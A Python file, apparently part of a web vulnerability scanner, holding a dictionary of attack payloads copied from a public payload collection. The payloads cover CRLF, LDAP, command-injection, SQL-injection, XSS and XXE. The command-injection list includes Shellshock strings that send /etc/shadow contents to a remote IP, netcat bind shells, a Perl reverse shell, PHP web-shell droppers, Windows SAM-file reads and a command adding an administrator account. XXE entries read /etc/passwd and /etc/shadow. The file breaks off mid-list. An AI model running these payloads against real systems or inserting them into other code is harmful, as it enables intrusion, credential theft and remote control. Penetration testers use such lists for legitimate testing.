# AUTO-GENERATED: Payloads from PayloadsAllTheThings GitHub
# Reference: https://github.com/swisskyrepo/PayloadsAllTheThings
# Downloaded automatically

GITHUB_PAYLOADS_DB = {
    'crlf': [
        '/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection',
        '/%u000aSet-Cookie:crlf=injection',
        '/%0aSet-Cookie:crlf=injection',
        '/%25250aSet-Cookie:crlf=injection',
        '/%250aSet-Cookie:crlf=injection',
        '/%23%0aSet-Cookie:crlf=injection',
        '/%0dSet-Cookie:crlf=injection',
        '/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection',
        '/%3f%0dSet-Cookie:crlf=injection',
        '/%3f%0d%0aSet-Cookie:crlf=injection',
        '/%23%0dSet-Cookie:crlf=injection',
        '/%25%30%61Set-Cookie:crlf=injection',
        '/%0d%0aSet-Cookie:crlf=injection',
        '/%2F..%0d%0aSet-Cookie:crlf=injection',
        '/%23%0d%0aSet-Cookie:crlf=injection',
        '/%25%30aSet-Cookie:crlf=injection',
        '/%%0a0aSet-Cookie:crlf=injection',
    ],
    'ldap': [
        'admin*',
        'facsimileTelephoneNumber',
        "x' or name()='username' or 'x'='ys",
        'commonName',
        'password',
        "*()|%26'",
        "x' or name()='username' or 'x'='y",
        '*(|(mail=*))',
        'name',
        'surname',
        'givenName',
        "*()|&'",
        'objectClass',
        'jpegPhoto',
        'mail',
        'admin*)((|userPassword=*)',
        'admin*)((|userpassword=*)',
        'homePhone',
        ')(cn=))\\x00',
        'pager',
        '%2A%28%7C%28objectclass%3D%2A%29%29',
        'username',
        'userPassword',
        '*))%00',
        '%2A%7C',
        'mobile',
        '*)(&',
        '*(|(objectclass=*))',
        'owner',
        '*)(uid=*))(|(uid=*',
        '%2A%28%7C%28mail%3D%2A%29%29',
    ],
    'rce': [
        '() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\\`grep root /etc/shadow\\`"',
        'perl -e \'print "X"x4096\'',
        '{${sleep(hexdec(dechex(20)))}}',
        '"|/usr/bin/id|"',
        '&& curl https://crowdshield.com/.testing/rce_vuln.txt',
        'type C:\\WINNT\\repair\\SAM',
        'which curl',
        '| whoami',
        '&& perl -e \'print "X"x8096\'',
        '; sleep 15',
        '| perl -e \'print "X"x8096\'',
        '{{[] .__ Class __.__ base __.__ subclasses __ ()}}',
        ";system('/usr/bin/id')",
        '|/bin/ls -al',
        '& ls -l /tmp',
        'which perl',
        '\\nid|',
        '&& net view',
        '| net localgroup Administrators hacker /ADD',
        '() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\\`whoami\\`"',
        '\\nid\\n',
        'which wget',
        '() { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3"',
        "& system('sleep 5');",
        'ls -l /home/*',
        "eval('whoami');",
        '& sysinfo',
        '| dir C:\\Documents and Settings\\*',
        '& reg add "HKLM\\System\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
        '" & whoami',
        "exec('pwd');",
        'phpinfo()',
        'a);id|',
        'echo "<?php system(\'dir $_GET[\'dir\']\'); ?>" > dir.php',
        '| dir',
        '<!--#exec cmd="/usr/bin/id;-->',
        'test* & perl -e \'print "X"x16096\'',
        '&& echo "<?php include($_GET[\'page\']); ?>" > rfi.php',
        '& type %SYSTEMROOT%\\repair\\SAM',
        '||/usr/bin/id;',
        '\\r\\n',
        '() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8"',
        'ls -l /var/www/*',
        '& echo "<?php system($_GET[\'cmd\']); ?>" > cmd.php',
        '&& dir C:\\',
        '; sleep 1',
        'nc -lvvp 4444 -e /bin/sh',
        '& ls -laR /etc',
        '() { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7"',
        '&& sysinfo',
        '; uname -a',
        '| type %SYSTEMROOT%\\repair\\SAM',
        'which gcc',
        '() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\\`nc -lvvp 1235 -e /bin/bash\\`"',
        '; ipconfig /all',
        ';/usr/bin/id|',
        '() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\\`nc -lvvp 1236 -e /bin/bash &\\`"',
        '%27%0A/usr/bin/id%0A%27',
        '; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl',
        "system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf')",
        '| type C:\\Windows\\repair\\SAM',
        '() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5"',
        'ls -l /',
        '\\n\\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\\`whoami\\`',
        'a);id',
        "' || whoami",
        '<?php system("sleep 5");?>',
        '& systeminfo',
        'perl -e \'print "X"x8192\'',
        'a;id\\n',
        '\\nid;',
        ';/usr/bin/id\\n',
        'whoami',
        '() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname -a\\`"',
        'a|id|',
        '() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\\`whoami\\`"',
        ';id\\n',
        '& ping -i 30 127.0.0.1 &',
        '; curl https://crowdshield.com/.testing/rce_vuln.txt',
        'perl -e \'print "X"x16384\'',
        "'; whoami",
        '& echo "<?php include($_GET[\'page\']); ?>" > rfi.php',
        '&& perl -e \'print "X"x2048\'',
        "system('cat /etc/passwd');",
        '&& pwd',
        '; echo "<?php system($_GET[\'cmd\']); ?>" > cmd.php',
        '$;/usr/bin/id',
        '&& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl',
        '() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\\`nc -lvvp 1234 -e /bin/bash\\`"',
        '; ifconfig',
        '\\n/usr/bin/id|',
        'which netcat',
        'echo "<?php system($_GET[\'cmd\']); ?>" > cmd.php',
        'ls -lh /etc/',
        '$(`dir`)',
        '|| sleep 15',
        '() { :;}; echo vulnerable 10',
        '| ls -l /var/www/*',
        '%0a id %0a',
        "system('cat config.php');",
    ],
    'sqli': [
        "') or true--",
        'UNION ALL SELECT 1,2,3,4,5,6,7,8--',
        'ORDER BY SLEEP(5)',
        'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))--',
        "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i",
        "' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i",
        "') or ('1'='1--",
        "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#",
        'select session_user;',
        "and (select substring(@@version,3,1))='S'",
        '" or 1=1 –',
        'admin" or 1=1--',
        'admin") or "1"="1',
        'or 0=0 –',
        'and 1=1–',
        'select current_user;',
        "');waitfor delay '0:0:5'--",
        "' or ''^'",
        "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8--",
        "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--",
        "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18",
        "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24",
        "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#",
        '"||pg_sleep(5)--',
        "' union (select NULL, (select @@version)) --",
        "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i",
        'ORDER BY 10#',
        '1) or sleep(5)#',
        "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12#",
        "') or ('x')=('x",
        "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6",
        ")) waitfor delay '0:0:20' /*",
        'ORDER BY 11--',
        "' and substring(password/text(),1,1)='7",
        "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14",
        "admin' or '1'='1'/*",
        '[$ne]=1',
        "exec master..xp_cmdshell 'net+users'",
        'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#',
        "' and 1='1",
        'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))--',
        "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9#",
        'UNION ALL SELECT 1,2,3,4,5,6,7,8#',
        "' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --",
        'ORDER BY 16',
        'RANDOMBLOB(1000000000/2)',
        'UNION ALL SELECT 1',
        "'&&SLEEP(5)&&'1",
        "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25",
        'OR 1=0#',
        'UNION ALL SELECT NULL--',
        "' grant connect to name; grant resource to name; --",
        'or true',
        "' or 1=1#",
        'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17',
        "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6--",
        "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23",
        'ORDER BY 12',
        "' or 0=0 #",
        '" or 1=1–',
        "admin' or '1'='1",
        "1/*'*/",
        "'))||pg_sleep(5)--",
        '&&SLEEP(5)#',
        "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--",
        'admin"/*',
        "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12--",
        'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#',
        "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5",
        "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i",
        'select current_database();',
        "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13#",
        'OR x=y#',
        "' waitfor delay '0:0:20' /*",
        'ORDER BY 18--',
        "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--",
        "' or 'one'='one–",
        'IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--',
        'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--',
        "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19",
        'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11#',
        '1 and 1=1',
        "admin' or 1=1--",
        "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10#",
        "';sleep(5000);'",
        '") or "1"="1',
        "'=' 'or' and '=' 'or'",
        "BACKUP database master to disks='\\\\<attackerip>\\<attackerip>\\backupdb.dat'",
        "')) and 0=benchmark(3000000,MD5(1))%20--",
        "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i",
        'ORDER BY 14#',
        "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--",
        'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13',
        'UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12#',
        'UNION ALL SELECT 1,2,3,4,5,6,7,8,9--',
        "' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i",
        "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16#",
        'ORDER BY 23--',
        "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6#",
        'select * from pg_shadow;',
    ],
    'xss': [
        '<img src="x` `<script>javascript:alert(6082)</script>"` `>',
        '<img\\x13src=x onerror="javascript:alert(6931)">',
        'ABC<div style="x:expression\\x00(javascript:alert(1)">DEF',
        'onanimationiteration',
        "<script>self['alert'](2)</script>",
        '<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>',
        '`"\'><img src=xxx:x onerror\\x0C=javascript:alert(3988)>',
        '<button form=test onformchange=alert(1)>//INJECTX',
        '<IMG STYLE="xss:expr/*XSS*/ession(alert(8012))">',
        '<STYLE type="text/css">BODY{background:url("javascript:alert(\'XSS\')")}</STYLE>',
        '<feImage>',
        '<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(126)" style="behavior:url(#x);"><param name=postdomevents /></object>//["\'`-->]]>]</div>',
        '<script>/* *\\x2A/javascript:alert(1)// */</script>',
        '"`\'><script>\\xE2\\x80\\x85javascript:alert(1)</script>',
        '<img\\x10src=x onerror="javascript:alert(1)">',
        '<a href="jav&#97ascript:javascript:alert(2440)">test1</a>',
        '<!--<img src="--><img src=x onerror=javascript:alert(0778)//">',
        '<a href="javascript\\x3Ajavascript:alert(1812)" id="fuzzelement1">test</a>',
        '</html>//["\'`-->]]>]</div>',
        'ABC<div style="x:\\xE2\\x80\\x81expression(javascript:alert(4086)">DEF',
        '"><script>alert(String.fromCharCode(88,83,83))</script>',
        "<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>",
        'onbeforeinput',
        '</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(',
        '"`\'><script>\\xE2\\x80\\x82javascript:alert(5360)</script>',
        'onBeforeCopy',
        '<a href="javascript&colon;\\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>',
        '</xmp>',
        '<img\\x11src=x onerror="javascript:alert(0625)">',
        '<iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>//["\'`-->]]>]</div>',
        'onDragStart',
        '<iframe/src \\/\\/onload = prompt(5682)',
        '<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa  aaaaaaaaa aaaaaaaaaa  href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe',
        '"><script+src="https://www.blogger.com/feeds/5578653387562324002/posts/summary/4427562025302749269?callback=alert(1337)"></script>',
        '<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>',
        '<body onPopState body onPopState="javascript:javascript:alert(2612)"></body onPopState>',
        '`"\'><img src=xxx:x onerror\\x0D=javascript:alert(2142)>',
        'onKeyPress',
        '<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>',
        '"`\'><script>\\xC2\\x85javascript:alert(1)</script>',
        "<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>",
        "<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>",
        '<IMG SRC="jav\tascript:javascript:alert(1);">',
        '<script>if("x\\\\xE1\\x96\\x89".length==2) { javascript:alert(0670);}</script>',
        'onClick',
        '<a href="\\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>',
        'ABC<div style="x:\\xE2\\x80\\x88expression(javascript:alert(9348)">DEF',
        '*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */',
        '"><script+src="https://wb.amap.com/channel.php?callback=alert(1337)"></script>',
        "alert('bar');",
        '"><script+src="https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?cb=alert(1337)"></script>',
        '<script\\x00>javascript:alert(1)</script>',
        'onauxclick',
        '<body onkeyup body onkeyup="javascript:javascript:alert(3112)"></body onkeyup>',
        "<BODY ONLOAD=alert('XSS')>",
        "//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//",
        '<div id="137"><svg>',
        "'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000EB)%3C/script%3E",
        '"/><img/onerror=\\x22javascript:alert(0795)\\x22src=xxx:x />',
        'onBegin',
        '<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>',
        '<div id="116"><div id="x">x</div>',
        '<x OnXxx=1',
        'FSCommand',
        '<BGSOUND SRC="javascript:alert(5993);">',
        "<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();",
        'onfocus',
        '<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>',
        'onmouseover',
        '1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(6715)&gt;`>',
        '"/><img/onerror=\\x27javascript:alert(5226)\\x27src=xxx:x />',
        '<style></style\\x20<img src="about:blank" onerror=javascript:alert(1)//></style>',
        '<script>$=1,\\u0061lert($)</script>',
        '&#x0003c',
        '"`\'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>',
        '<IFRAME SRC="javascript:javascript:alert(3512);"></IFRAME>',
        '<div id="92"><div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>//["\'`-->]]>]</div><div id="93"><div style="list-style:url(http://foo.f)\\20url(javascript:alert(93));">X</div>//["\'`-->]]>]</div>',
        '<!-- Up to Opera 11.64 - see link below -->',
        '<body>',
        '<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open(\'GET\', \'.\', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = \'(.*?)\'/)[1]) };xhr.send();',
        '<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>',
        'onplay',
        '<!--[if gte IE 4]><SCRIPT>javascript:alert(8303);</SCRIPT><![endif]-->',
        '<svg/onload=alert(1)>//INJECTX',
        '<!-- up to FF 13 -->',
        'onselectstart',
        '<form id="test" /><button form="test" formaction="javascript:javascript:alert(9282)">X',
        '"><script+src="http://api.m.sm.cn/rest?method=tools.sider&callback=jsonp_1869510867%3balert(1)%2f%2f794"></script>',
        '<img src=x onerror=\\x10"javascript:alert(1)">',
        '<title onPropertyChange title onPropertyChange="javascript:javascript:alert(5255)"></title onPropertyChange>',
        '<input autofocus onfocus=alert(1)>',
        '<html xmlns="http://www.w3.org/1999/xhtml">',
        '<? foo="><script>alert(91)</script>">',
        'ABC<div style="x\\x3Aexpression(javascript:alert(1)">DEF',
        'getURL("javascript:alert(\'XSS\')")',
        '<a href="\\x10javascript:javascript:alert(7391)" id="fuzzelement1">test</a>',
        "<iframe srcdoc='&lt;body onload=prompt&lpar;1411&rpar;&gt;'>",
        '<script charset="\\x22>javascript:alert(1)</script>',
        '<script>  function foo(elem, doc, text) {   elem.onclick = function (e) {    e.__defineGetter__(text[0], function () { return true })    alert(Safe.get());   };      var event = doc.createEvent(text[1]);   event.initEvent(text[2], true, true);   elem.dispatchEvent(event);  } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #',
        '<input type="text" value=``<div/onmouseover=\'alert(1)\'>X</div>',
    ],
    'xxe': [
        '<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><script>alert(123)</script></xsl:template></xsl:stylesheet>',
        '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE doc [<!ELEMENT test ANY ><!ENTITY xxe SYSTEM "php://filter/read-convert.base64-encode/resource=file:///C:/htdocs/wordpress/wp-config.php" >]><doc><test>Contents of file: &xxe;</test></doc>',
        "<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>",
        '%foo;',
        "<test> $lDOMDocument->textContent=<![CDATA[<]]>script<![CDATA[>]]>alert('XSS')<![CDATA[<]]>/script<![CDATA[>]]> </test>",
        '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>',
        '<?xml version="1.0" encoding="ISO-8859-1"?>',
        '<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>',
        '"}}</script>\'',
        '<!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]>',
        '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>',
        '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com:80" >]><foo>&xxe;</foo>',
        '<!ENTITY % int "<!ENTITY &#37; trick SYSTEM \'http://127.0.0.1:80/?%file;\'>\xa0 "> %int;',
        '<?xml version="1.0"?><change-log><text>&quot;Hello World&quot;</text></change-log>',
        '<!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root>',
        '<HTML xmlns:xss><?import namespace="xss" implementation="https://crowdshield.com/.testing/xss.html"><xss:xss>XSS</xss:xss></HTML>',
        '<?xml version="1.0" encoding="ISO-8859-1"?><test></test>',
        '}}</script>""\'"',
        '&foo;',
        '\'}}</script>"',
        '<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]>',
        '<!ENTITY systemEntity SYSTEM "robots.txt">',
        '<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>',
        '<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com/text.txt" >]>',
        '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo><?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xxe;</foo>',
        '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example:443" >]>',
        '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE doc [<!ELEMENT test ANY ><!ENTITY xxe SYSTEM "php://filter/read-convert.base64-encode/resource=file:///C:/boot.ini" >]><doc><test>Contents of file: &xxe;</test></doc>',
        '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]>',
        '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>',
        '<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[\' or 1=1 or \'\'=\']]></foo>',
        "<name>','')); phpinfo(); exit;/*</name>",
        '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]><foo>&xxe;</foo>',
        '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]>',
        '<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]>',
        '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>',
        'count(/child::node())',
        '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "https://crowdshield.com/.testing/rfi_vuln.txt">]><foo>&xxe;</foo>',
        '<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(\'XSS\');">]]>',
        "<foo><![CDATA[' or 1=1 or ''=']]></foo>",
        '<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "robots.txt"> ]> <change-log> <text>&systemEntity;</text> </change-log>',
        '<![CDATA[<script>var n=0;while(true){n++;}</script>]]>',
        '}}</script><script>alert(1);</script></body></html><!--',
        "<foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>",
        '<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>',
        '<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:copy-of select="document(\'/etc/passwd\')"/></xsl:template></xsl:stylesheet>',
        '<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(\'XSS\');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>',
        '<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [     <!ELEMENT foo ANY >  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>',
        '}}</script>\'"',
        '<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [     <!ELEMENT foo ANY >   <!ENTITY xxe SYSTEM "https://crowdshield.com/.testing/rfi.txt" >]><foo>&xxe;</foo>',
        '<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "../../../../boot.ini"> ]> <change-log> <text>&systemEntity;</text> </change-log>',
        '<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(\'XSS\');">]]>"',
        '<change-log> <text>&systemEntity;</text> </change-log>',
        '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY >   <!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt">]><foo>&xxe;</foo>',
        '<xml version="1.0"?><!DOCTYPE XXE [<!ELEMENT methodName ANY ><!ENTITY xxe SYSTEM "../../../../../../../etc/passwd">]><methodCall><methodName>&xxe</methodName></methodCall>',
        '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "http://xerosecurity.com/.testing/rfi_vuln.txt">]><foo>&xxe;</foo>',
